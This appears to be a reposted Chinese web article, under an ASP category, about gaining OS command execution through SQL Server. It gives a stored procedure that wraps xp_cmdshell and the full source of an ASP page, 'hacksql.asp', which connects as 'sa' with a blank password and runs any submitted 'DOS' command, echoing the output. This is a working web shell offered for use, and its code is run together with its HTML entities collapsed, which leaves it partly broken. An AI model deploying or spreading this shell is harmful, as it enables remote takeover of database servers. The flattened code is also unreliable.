所属类别:Asp
文章作者:未知
特别推荐:免费发布信息 承包关键词~~抢爆了!HOT!
1、首先在sql里面你能够访问的数据库里面建立存储过程,比如说:ddy如下:CREATE PROCEDURE ddy@cmd varchar(50)ASexec master..xp_cmdshell @cmd2、asp程序里如下:(hacksql.asp)<%cmd=trim(Request.Form("cmd"))if cmd<>"" thenwork()elseshow()end iffunction work()set conn=server.CreateObject("adodb.connection")set rs=server.CreateObject("adodb.recordset")conn.Open "xx","sa",""sql="exec ddy '"&cmd&"'"rs.Open sql,connif not rs.EOF thendo while not rs.eofResponse.Write ""&htmlencode2(trim(rs(0)))&""rs.MoveNextloopelseResponse.Write "no"end ifif rs.State=1 then rs.closeset rs=nothingconn.Closeset conn=nothingend functionfunction show()%>请输入DOS命令:<%end functionfunction htmlencode2(str)'--------转换函数(为了显示时比较工整)dim resultdim lif isnull(str) thenhtmlencode2=""exit functionend ifl=len(str)result=""dim ifor i = 1 to lselect case mid(str,i,1)case "<"result=result+"<"case ">"result=result+">"case chr(34)result=result+"""case "&"result=result+"&"case chr(13)result=result+""case chr(9)result=result+" "case "'"result=result+"’"case chr(32)result=result+" "if i+1<=l and i-1>0 thenif mid(str,i+1,1)=chr(32) or mid(str,i+1,1)=chr(9) or mid(str,i-1,1)=chr(32) or mid(str,i-1,1)=chr(9) thenresult=result+" "elseresult=result+" "end ifelseresult=result+" "end ifcase elseresult=result+mid(str,i,1)end selectnexthtmlencode2=resultend function%>关闭本页
相关信息· 提高 双系统引导菜单玩通透
· 使用netfilter/iptables构建防火墙(赞!)
· 判断点相对于直线的状态(位置)
· Redhat 8.0系统配置命令
58985
44919